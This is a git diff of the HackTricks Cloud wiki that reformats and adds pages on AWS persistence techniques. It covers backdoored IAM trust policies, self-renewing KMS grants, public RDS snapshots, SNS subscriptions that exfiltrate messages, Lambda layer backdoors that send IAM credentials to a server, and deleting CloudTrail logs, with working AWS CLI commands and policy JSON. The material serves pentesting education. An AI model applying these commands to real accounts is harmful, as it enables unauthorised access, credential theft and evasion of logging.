-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md new file mode 100644 index 000000000..99916b572 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md @@ -0,0 +1,21 @@ +# AWS - EFS Persistence + +{{#include ../../../banners/hacktricks-training.md}} + +## EFS + +For more information check: + +{{#ref}} +../aws-services/aws-efs-enum.md +{{#endref}} + +### Modify Resource Policy / Security Groups + +Modifying the **resource policy and/or security groups** you can try to persist your access into the file system. + +### Create Access Point + +You could **create an access point** (with root access to `/`) accessible from a service were you have implemented **other persistence** to keep privileged access to the file system. + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md similarity index 51% rename from pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md rename to src/pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md index 068ef11c5..6ff600d5e 100644 --- a/pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md @@ -1,27 +1,14 @@ # AWS - Elastic Beanstalk Persistence -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Elastic Beanstalk For more information check: -{% content-ref url="../aws-services/aws-elastic-beanstalk-enum.md" %} -[aws-elastic-beanstalk-enum.md](../aws-services/aws-elastic-beanstalk-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-elastic-beanstalk-enum.md +{{#endref}} ### Persistence in Instance @@ -37,9 +24,8 @@ Instead of changing the code on the actual version, the attacker could deploy a ### Abusing Custom Resource Lifecycle Hooks -{% hint style="info" %} -TODO: Test -{% endhint %} +> [!NOTE] +> TODO: Test Elastic Beanstalk provides lifecycle hooks that allow you to run custom scripts during instance provisioning and termination. An attacker could **configure a lifecycle hook to periodically execute a script that exfiltrates data or maintains access to the AWS account**. @@ -88,17 +74,4 @@ echo 'Resources: aws elasticbeanstalk update-environment --environment-name my-env --option-settings Namespace="aws:elasticbeanstalk:customoption",OptionName="CustomConfigurationTemplate",Value="stealthy_lifecycle_hook.yaml" ``` -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md new file mode 100644 index 000000000..9cab10503 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md @@ -0,0 +1,49 @@ +# AWS - IAM Persistence + +{{#include ../../../banners/hacktricks-training.md}} + +## IAM + +For more information access: + +{{#ref}} +../aws-services/aws-iam-enum.md +{{#endref}} + +### Common IAM Persistence + +- Create a user +- Add a controlled user to a privileged group +- Create access keys (of the new user or of all users) +- Grant extra permissions to controlled users/groups (attached policies or inline policies) +- Disable MFA / Add you own MFA device +- Create a Role Chain Juggling situation (more on this below in STS persistence) + +### Backdoor Role Trust Policies + +You could backdoor a trust policy to be able to assume it for an external resource controlled by you (or to everyone): + +```json +{ + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Principal": { + "AWS": ["*", "arn:aws:iam::123213123123:root"] + }, + "Action": "sts:AssumeRole" + } + ] +} +``` + +### Backdoor Policy Version + +Give Administrator permissions to a policy in not its last version (the last version should looks legit), then assign that version of the policy to a controlled user/group. + +### Backdoor / Create Identity Provider + +If the account is already trusting a common identity provider (such as Github) the conditions of the trust could be increased so the attacker can abuse them. + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md new file mode 100644 index 000000000..5a9646176 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md @@ -0,0 +1,39 @@ +# AWS - KMS Persistence + +{{#include ../../../banners/hacktricks-training.md}} + +## KMS + +For mor information check: + +{{#ref}} +../aws-services/aws-kms-enum.md +{{#endref}} + +### Grant acces via KMS policies + +An attacker could use the permission **`kms:PutKeyPolicy`** to **give access** to a key to a user under his control or even to an external account. Check the [**KMS Privesc page**](../aws-privilege-escalation/aws-kms-privesc.md) for more information. + +### Eternal Grant + +Grants are another way to give a principal some permissions over a specific key. It's possible to give a grant that allows a user to create grants. Moreover, a user can have several grant (even identical) over the same key. + +Therefore, it's possible for a user to have 10 grants with all the permissions. The attacker should monitor this constantly. And if at some point 1 grant is removed another 10 should be generated. + +(We are using 10 and not 2 to be able to detect that a grant was removed while the user still has some grant) + +```bash +# To generate grants, generate 10 like this one +aws kms create-grant \ + --key-id \ + --grantee-principal \ + --operations "CreateGrant" "Decrypt" + +# To monitor grants +aws kms list-grants --key-id +``` + +> [!NOTE] +> A grant can give permissions only from this: [https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations](https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations) + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md new file mode 100644 index 000000000..7eaa170fd --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md @@ -0,0 +1,64 @@ +# AWS - Lambda Persistence + +{{#include ../../../../banners/hacktricks-training.md}} + +## Lambda + +For more information check: + +{{#ref}} +../../aws-services/aws-lambda-enum.md +{{#endref}} + +### Lambda Layer Persistence + +It's possible to **introduce/backdoor a layer to execute arbitrary code** when the lambda is executed in a stealthy way: + +{{#ref}} +aws-lambda-layers-persistence.md +{{#endref}} + +### Lambda Extension Persistence + +Abusing Lambda Layers it's also possible to abuse extensions and persist in the lambda but also steal and modify requests. + +{{#ref}} +aws-abusing-lambda-extensions.md +{{#endref}} + +### Via resource policies + +It's possible to grant access to different lambda actions (such as invoke or update code) to external accounts: + +
+ +### Versions, Aliases & Weights + +A Lambda can have **different versions** (with different code each version).\ +Then, you can create **different aliases with different versions** of the lambda and set different weights to each.\ +This way an attacker could create a **backdoored version 1** and a **version 2 with only the legit code** and **only execute the version 1 in 1%** of the requests to remain stealth. + +
+ +### Version Backdoor + API Gateway + +1. Copy the original code of the Lambda +2. **Create a new version backdooring** the original code (or just with malicious code). Publish and **deploy that version** to $LATEST + 1. Call the API gateway related to the lambda to execute the code +3. **Create a new version with the original code**, Publish and deploy that **version** to $LATEST. + 1. This will hide the backdoored code in a previous version +4. Go to the API Gateway and **create a new POST method** (or choose any other method) that will execute the backdoored version of the lambda: `arn:aws:lambda:us-east-1::function::1` + 1. Note the final :1 of the arn **indicating the version of the function** (version 1 will be the backdoored one in this scenario). +5. Select the POST method created and in Actions select **`Deploy API`** +6. Now, when you **call the function via POST your Backdoor** will be invoked + +### Cron/Event actuator + +The fact that you can make **lambda functions run when something happen or when some time pass** makes lambda a nice and common way to obtain persistence and avoid detection.\ +Here you have some ideas to make your **presence in AWS more stealth by creating lambdas**. + +- Every time a new user is created lambda generates a new user key and send it to the attacker. +- Every time a new role is created lambda gives assume role permissions to compromised users. +- Every time new cloudtrail logs are generated, delete/alter them + +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md new file mode 100644 index 000000000..3f78cfd42 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md @@ -0,0 +1,42 @@ +# AWS - Abusing Lambda Extensions + +{{#include ../../../../banners/hacktricks-training.md}} + +## Lambda Extensions + +Lambda extensions enhance functions by integrating with various **monitoring, observability, security, and governance tools**. These extensions, added via [.zip archives using Lambda layers](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) or included in [container image deployments](https://aws.amazon.com/blogs/compute/working-with-lambda-layers-and-extensions-in-container-images/), operate in two modes: **internal** and **external**. + +- **Internal extensions** merge with the runtime process, manipulating its startup using **language-specific environment variables** and **wrapper scripts**. This customization applies to a range of runtimes, including **Java Correto 8 and 11, Node.js 10 and 12, and .NET Core 3.1**. +- **External extensions** run as separate processes, maintaining operation alignment with the Lambda function's lifecycle. They're compatible with various runtimes like **Node.js 10 and 12, Python 3.7 and 3.8, Ruby 2.5 and 2.7, Java Corretto 8 and 11, .NET Core 3.1**, and **custom runtimes**. + +For more information about [**how lambda extensions work check the docs**](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-extensions-api.html). + +### External Extension for Persistence, Stealing Requests & modifying Requests + +This is a summary of the technique proposed in this post: [https://www.clearvector.com/blog/lambda-spy/](https://www.clearvector.com/blog/lambda-spy/) + +It was found that the default Linux kernel in the Lambda runtime environment is compiled with “**process_vm_readv**” and “**process_vm_writev**” system calls. And all processes run with the same user ID, even the new process created for the external extension. **This means that an external extension has full read and write access to Rapid’s heap memory, by design.** + +Moreover, while Lambda extensions have the capability to **subscribe to invocation events**, AWS does not reveal the raw data to these extensions. This ensures that **extensions cannot access sensitive information** transmitted via the HTTP request. + +The Init (Rapid) process monitors all API requests at [http://127.0.0.1:9001](http://127.0.0.1:9001/) while Lambda extensions are initialized and run prior to the execution of any runtime code, but after Rapid. + +

https://www.clearvector.com/blog/content/images/size/w1000/2022/11/2022110801.rapid.default.png

+ +The variable **`AWS_LAMBDA_RUNTIME_API`** indicates the **IP** address and **port** number of the Rapid API to **child runtime processes** and additional extensions. + +> [!WARNING] +> By changing the **`AWS_LAMBDA_RUNTIME_API`** environment variable to a **`port`** we have access to, it's possible to intercept all actions within the Lambda runtime (**man-in-the-middle**). This is possible because the extension runs with the same privileges as Rapid Init, and the system's kernel allows for **modification of process memory**, enabling the alteration of the port number. + +Because **extensions run before any runtime code**, modifying the environment variable will influence the runtime process (e.g., Python, Java, Node, Ruby) as it starts. Furthermore, **extensions loaded after** ours, which rely on this variable, will also route through our extension. This setup could enable malware to entirely bypass security measures or logging extensions directly within the runtime environment. + +

https://www.clearvector.com/blog/content/images/size/w1000/2022/11/2022110801.rapid.mitm.png

+ +The tool [**lambda-spy**](https://github.com/clearvector/lambda-spy) was created to perform that **memory write** and **steal sensitive information** from lambda requests, other **extensions** **requests** and even **modify them**. + +## References + +- [https://aws.amazon.com/blogs/compute/building-extensions-for-aws-lambda-in-preview/](https://aws.amazon.com/blogs/compute/building-extensions-for-aws-lambda-in-preview/) +- [https://www.clearvector.com/blog/lambda-spy/](https://www.clearvector.com/blog/lambda-spy/) + +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md similarity index 65% rename from pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md rename to src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md index dd762e60e..4b5b8e335 100644 --- a/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md @@ -1,19 +1,6 @@ # AWS - Lambda Layers Persistence -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} ## Lambda Layers @@ -35,21 +22,19 @@ The load path that Python will use in lambda is the following: Check how the **second** and third **positions** are occupy by directories where **lambda layers** uncompress their files: **`/opt/python/lib/python3.9/site-packages`** and **`/opt/python`** -{% hint style="danger" %} -If an attacker managed to **backdoor** a used lambda **layer** or **add one** that will be **executing arbitrary code when a common library is loaded**, he will be able to execute malicious code with each lambda invocation. -{% endhint %} +> [!CAUTION] +> If an attacker managed to **backdoor** a used lambda **layer** or **add one** that will be **executing arbitrary code when a common library is loaded**, he will be able to execute malicious code with each lambda invocation. Therefore, the requisites are: -* **Check libraries** that are **loaded** by the victims code -* Create a **proxy library with lambda layers** that will **execute custom code** and **load the original** library. +- **Check libraries** that are **loaded** by the victims code +- Create a **proxy library with lambda layers** that will **execute custom code** and **load the original** library. ### Preloaded libraries -{% hint style="warning" %} -When abusing this technique I found a difficulty: Some libraries are **already loaded** in python runtime when your code gets executed. I was expecting to find things like `os` or `sys`, but **even `json` library was loaded**.\ -In order to abuse this persistence technique, the code needs to **load a new library that isn't loaded** when the code gets executed. -{% endhint %} +> [!WARNING] +> When abusing this technique I found a difficulty: Some libraries are **already loaded** in python runtime when your code gets executed. I was expecting to find things like `os` or `sys`, but **even `json` library was loaded**.\ +> In order to abuse this persistence technique, the code needs to **load a new library that isn't loaded** when the code gets executed. With a python code like this one it's possible to obtain the **list of libraries that are pre loaded** inside python runtime in lambda: @@ -79,8 +64,8 @@ For doing that, we are going to **create the directory csv** with the file **`__ Then, when the lambda is executed and try to load **csv**, our **`__init__.py` file will be loaded and executed**.\ This file must: -* Execute our payload -* Load the original csv library +- Execute our payload +- Load the original csv library We can do both with: @@ -112,9 +97,9 @@ You can find this code in [**https://github.com/carlospolop/LambdaLayerBackdoor* The integrated payload will **send the IAM creds to a server THE FIRST TIME it's invoked or AFTER a reset of the lambda container** (change of code or cold lambda), but **other techniques** such as the following could also be integrated: -{% content-ref url="../../aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md" %} -[aws-warm-lambda-persistence.md](../../aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md) -{% endcontent-ref %} +{{#ref}} +../../aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md +{{#endref}} ### External Layers @@ -123,12 +108,11 @@ Also note that the **max number of layers a lambda can have is 5**. Therefore, in order to improve the versatility of this technique an attacker could: -* Backdoor an existing layer of the user (nothing is external) -* **Create** a **layer** in **his account**, give the **victim account access** to use the layer, **configure** the **layer** in victims Lambda and **remove the permission**. - * The **Lambda** will still be able to **use the layer** and the **victim won't** have any easy way to **download the layers code** (apart from getting a rev shell inside the lambda) - * The victim **won't see external layers** used with **`aws lambda list-layers`** +- Backdoor an existing layer of the user (nothing is external) +- **Create** a **layer** in **his account**, give the **victim account access** to use the layer, **configure** the **layer** in victims Lambda and **remove the permission**. + - The **Lambda** will still be able to **use the layer** and the **victim won't** have any easy way to **download the layers code** (apart from getting a rev shell inside the lambda) + - The victim **won't see external layers** used with **`aws lambda list-layers`** -{% code overflow="wrap" %} ```bash # Upload backdoor layer aws lambda publish-layer-version --layer-name "ExternalBackdoor" --zip-file file://backdoor.zip --compatible-architectures "x86_64" "arm64" --compatible-runtimes "python3.9" "python3.8" "python3.7" "python3.6" @@ -142,19 +126,5 @@ aws lambda add-layer-version-permission --layer-name ExternalBackdoor --statemen # Remove permissions aws lambda remove-layer-version-permission --layer-name ExternalBackdoor --statement-id xaccount --version-number 1 ``` -{% endcode %} -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md new file mode 100644 index 000000000..ca387e687 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md @@ -0,0 +1,33 @@ +# AWS - Lightsail Persistence + +{{#include ../../../banners/hacktricks-training.md}} + +## Lightsail + +For more information check: + +{{#ref}} +../aws-services/aws-lightsail-enum.md +{{#endref}} + +### Download Instance SSH keys & DB passwords + +They won't be changed probably so just having them is a good option for persistence + +### Backdoor Instances + +An attacker could get access to the instances and backdoor them: + +- Using a traditional **rootkit** for example +- Adding a new **public SSH key** +- Expose a port with port knocking with a backdoor + +### DNS persistence + +If domains are configured: + +- Create a subdomain pointing your IP so you will have a **subdomain takeover** +- Create **SPF** record allowing you to send **emails** from the domain +- Configure the **main domain IP to your own one** and perform a **MitM** from your IP to the legit ones + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md new file mode 100644 index 000000000..83e574fbe --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md @@ -0,0 +1,31 @@ +# AWS - RDS Persistence + +{{#include ../../../banners/hacktricks-training.md}} + +## RDS + +For more information check: + +{{#ref}} +../aws-services/aws-relational-database-rds-enum.md +{{#endref}} + +### Make instance publicly accessible: `rds:ModifyDBInstance` + +An attacker with this permission can **modify an existing RDS instance to enable public accessibility**. + +```bash +aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately +``` + +### Create an admin user inside the DB + +An attacker could just **create a user inside the DB** so even if the master users password is modified he **doesn't lose the access** to the database. + +### Make snapshot public + +```bash +aws rds modify-db-snapshot-attribute --db-snapshot-identifier --attribute-name restore --values-to-add all +``` + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md new file mode 100644 index 000000000..6db5208b1 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md @@ -0,0 +1,25 @@ +# AWS - S3 Persistence + +{{#include ../../../banners/hacktricks-training.md}} + +## S3 + +For more information check: + +{{#ref}} +../aws-services/aws-s3-athena-and-glacier-enum.md +{{#endref}} + +### KMS Client-Side Encryption + +When the encryption process is done the user will use the KMS API to generate a new key (`aws kms generate-data-key`) and he will **store the generated encrypted key inside the metadata** of the file ([python code example](https://aioboto3.readthedocs.io/en/latest/cse.html#how-it-works-kms-managed-keys)) so when the decrypting occur it can decrypt it using KMS again: + +
+ +Therefore, and attacker could get this key from the metadata and decrypt with KMS (`aws kms decrypt`) to obtain the key used to encrypt the information. This way the attacker will have the encryption key and if that key is reused to encrypt other files he will be able to use it. + +### Using S3 ACLs + +Although usually ACLs of buckets are disabled, an attacker with enough privileges could abuse them (if enabled or if the attacker can enable them) to keep access to the S3 bucket. + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md new file mode 100644 index 000000000..e38afcdea --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md @@ -0,0 +1,53 @@ +# AWS - Secrets Manager Persistence + +{{#include ../../../banners/hacktricks-training.md}} + +## Secrets Manager + +For more info check: + +{{#ref}} +../aws-services/aws-secrets-manager-enum.md +{{#endref}} + +### Via Resource Policies + +It's possible to **grant access to secrets to external accounts** via resource policies. Check the [**Secrets Manager Privesc page**](../aws-privilege-escalation/aws-secrets-manager-privesc.md) for more information. Note that to **access a secret**, the external account will also **need access to the KMS key encrypting the secret**. + +### Via Secrets Rotate Lambda + +To **rotate secrets** automatically a configured **Lambda** is called. If an attacker could **change** the **code** he could directly **exfiltrate the new secret** to himself. + +This is how lambda code for such action could look like: + +```python +import boto3 + +def rotate_secrets(event, context): + # Create a Secrets Manager client + client = boto3.client('secretsmanager') + + # Retrieve the current secret value + secret_value = client.get_secret_value(SecretId='example_secret_id')['SecretString'] + + # Rotate the secret by updating its value + new_secret_value = rotate_secret(secret_value) + client.update_secret(SecretId='example_secret_id', SecretString=new_secret_value) + +def rotate_secret(secret_value): + # Perform the rotation logic here, e.g., generate a new password + + # Example: Generate a new password + new_secret_value = generate_password() + + return new_secret_value + +def generate_password(): + # Example: Generate a random password using the secrets module + import secrets + import string + password = ''.join(secrets.choice(string.ascii_letters + string.digits) for i in range(16)) + return password +``` + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md new file mode 100644 index 000000000..fc0a2bced --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md @@ -0,0 +1,81 @@ +# AWS - SNS Persistence + +{{#include ../../../banners/hacktricks-training.md}} + +## SNS + +For more information check: + +{{#ref}} +../aws-services/aws-sns-enum.md +{{#endref}} + +### Persistence + +When creating a **SNS topic** you need to indicate with an IAM policy **who has access to read and write**. It's possible to indicate external accounts, ARN of roles, or **even "\*"**.\ +The following policy gives everyone in AWS access to read and write in the SNS topic called **`MySNS.fifo`**: + +```json +{ + "Version": "2008-10-17", + "Id": "__default_policy_ID", + "Statement": [ + { + "Sid": "__default_statement_ID", + "Effect": "Allow", + "Principal": { + "AWS": "*" + }, + "Action": [ + "SNS:Publish", + "SNS:RemovePermission", + "SNS:SetTopicAttributes", + "SNS:DeleteTopic", + "SNS:ListSubscriptionsByTopic", + "SNS:GetTopicAttributes", + "SNS:AddPermission", + "SNS:Subscribe" + ], + "Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo", + "Condition": { + "StringEquals": { + "AWS:SourceOwner": "318142138553" + } + } + }, + { + "Sid": "__console_pub_0", + "Effect": "Allow", + "Principal": { + "AWS": "*" + }, + "Action": "SNS:Publish", + "Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo" + }, + { + "Sid": "__console_sub_0", + "Effect": "Allow", + "Principal": { + "AWS": "*" + }, + "Action": "SNS:Subscribe", + "Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo" + } + ] +} +``` + +### Create Subscribers + +To continue exfiltrating all the messages from all the topics and attacker could **create subscribers for all the topics**. + +Note that if the **topic is of type FIFO**, only subscribers using the protocol **SQS** can be used. + +```bash +aws sns subscribe --region \ + --protocol http \ + --notification-endpoint http:/// \ + --topic-arn +``` + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md new file mode 100644 index 000000000..50076c346 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md @@ -0,0 +1,39 @@ +# AWS - SQS Persistence + +{{#include ../../../banners/hacktricks-training.md}} + +## SQS + +For more information check: + +{{#ref}} +../aws-services/aws-sqs-and-sns-enum.md +{{#endref}} + +### Using resource policy + +In SQS you need to indicate with an IAM policy **who has access to read and write**. It's possible to indicate external accounts, ARN of roles, or **even "\*"**.\ +The following policy gives everyone in AWS access to everything in the queue called **MyTestQueue**: + +```json +{ + "Version": "2008-10-17", + "Id": "__default_policy_ID", + "Statement": [ + { + "Sid": "__owner_statement", + "Effect": "Allow", + "Principal": { + "AWS": "*" + }, + "Action": ["SQS:*"], + "Resource": "arn:aws:sqs:us-east-1:123123123123:MyTestQueue" + } + ] +} +``` + +> [!NOTE] +> You could even **trigger a Lambda in the attackers account every-time a new message** is put in the queue (you would need to re-put it) somehow. For this follow these instructinos: [https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html](https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html) + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md similarity index 100% rename from pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md rename to src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md new file mode 100644 index 000000000..b86077b38 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md @@ -0,0 +1,21 @@ +# AWS - Step Functions Persistence + +{{#include ../../../banners/hacktricks-training.md}} + +## Step Functions + +For more information check: + +{{#ref}} +../aws-services/aws-stepfunctions-enum.md +{{#endref}} + +### Step function Backdooring + +Backdoor a step function to make it perform any persistence trick so every time it's executed it will run your malicious steps. + +### Backdooring aliases + +If the AWS account is using aliases to call step functions it would be possible to modify an alias to use a new backdoored version of the step function. + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md similarity index 65% rename from pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md rename to src/pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md index 45549a99e..f95eb4b7e 100644 --- a/pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md @@ -1,27 +1,14 @@ # AWS - STS Persistence -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## STS For more information access: -{% content-ref url="../aws-services/aws-sts-enum.md" %} -[aws-sts-enum.md](../aws-services/aws-sts-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-sts-enum.md +{{#endref}} ### Assume role token @@ -54,9 +41,8 @@ optional arguments: -r ROLE_LIST [ROLE_LIST ...], --role-list ROLE_LIST [ROLE_LIST ...] ``` -{% hint style="danger" %} -Note that the [find\_circular\_trust.py](https://github.com/hotnops/AWSRoleJuggler/blob/master/find_circular_trust.py) script from that Github repository doesn't find all the ways a role chain can be configured. -{% endhint %} +> [!CAUTION] +> Note that the [find_circular_trust.py](https://github.com/hotnops/AWSRoleJuggler/blob/master/find_circular_trust.py) script from that Github repository doesn't find all the ways a role chain can be configured.
